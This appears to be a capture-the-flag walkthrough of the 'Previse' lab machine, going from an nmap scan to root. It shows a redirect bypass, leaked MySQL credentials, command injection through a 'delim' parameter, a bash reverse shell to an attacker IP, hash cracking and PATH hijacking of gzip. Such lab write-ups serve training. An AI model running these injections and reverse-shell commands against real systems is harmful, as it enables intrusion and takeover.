We start with nmap to discover open ports and services.
Nmap Scan
nmap -sC -sV -oA previse 10.10.11.104
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for 10.10.11.104
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have two open ports, ssh on 22 and http on 80, and their versions have no serious vulnerabilities.
So lets enumerate http port.
Enumerating HTTP
Going to http://10.10.11.104 redirects us to http://10.10.11.104/login.php
The page ends with .php, we know it’s a php app, so when we run a directory bruteforcer we need to specify .php extension.
I tried loggin in with admin:admin, admin:password and tried simple login bypass test’ or 1=1 — — but nothing worked.
So i launched gobuster with raft-medium-words.txt from Seclist gobuster dir -u http://10.10.11.104/ -w raft-medium-words.txt -t 100 -x php -b 404,403
When i try to access any of these files it redirects me to login.php. BUT when i intercept the request before redirecting, it says 302 Found but i can see the content of the page.
Lets visit /accounts.php
As you can see we can create a new user by submitting the same data as the form has, so to create a new user we need to send a POST request to /accounts.php with POST parameters username and password and confirm.
Now we have a new user embo1:embo1 lets login with it.
And we are logged in. There is SITEBACKUP.ZIP file and a user newguy in FILES page, lets download it.
As the file name says, it’s the backup of the web site.
The config.php file contains mysql credentials.
root:mySQL_p@ssw0rd!:)
In logs.php file it uses exec function on the POST parameter delim directly without validation.
So we can intercept the request and do something like this delim=space;whoami
, but it will not reflect in the response so lets try ping our machine delim=space;ping -c1 <Our IP>
(Don't forget to URL encode) and run tcpdump to capture it sudo tcpdump -n -i tun0 icmp
And we received ICMP echo request, now we have command execution lets get a shell on the box.
Initial Foothold
Lets replace the ping command with a reverse shell and run a netcat listener. delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
We reveiced a connection and we are on the box as www-data.
Getting User
After some enumeration i couldn’t find anything but remember the mysql credentials we got before? lets login to mysql using root:mySQL_p@ssw0rd!:)
I found accounts table inside previse database that contains m4lwhere md5crypt hash.
lets save the hash to a file to crack it with hashcat or john. hashcat -m 500 hash.txt rockyou.txt
OR john hash.txt --wordlist=/opt/rockyou.txt --format=md5crypt
I use hashcat on my windows host because it's much faster than john.
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
Now we have m4lwhere:ilovecody112235! lets ssh into the machine (or just use **su m4lwhere — **).
Getting Root
By running sudo -l we can run /opt/scripts/access_backup.sh as root.
Looking at the script, it’s running gzip without specifying the full path, means we can modify the $PATH variable to make it search for gzip in another directory where we have our own gzip script.
Lets create our gzip script in /dev/shm/ directory. chmod +x gzip
Now modifying $PATH variable to start with the directory that has our script.
Run a netcat listener nc nvlp 1337
and run the script sudo /opt/scripts/access_backup.sh
And we are ROOT !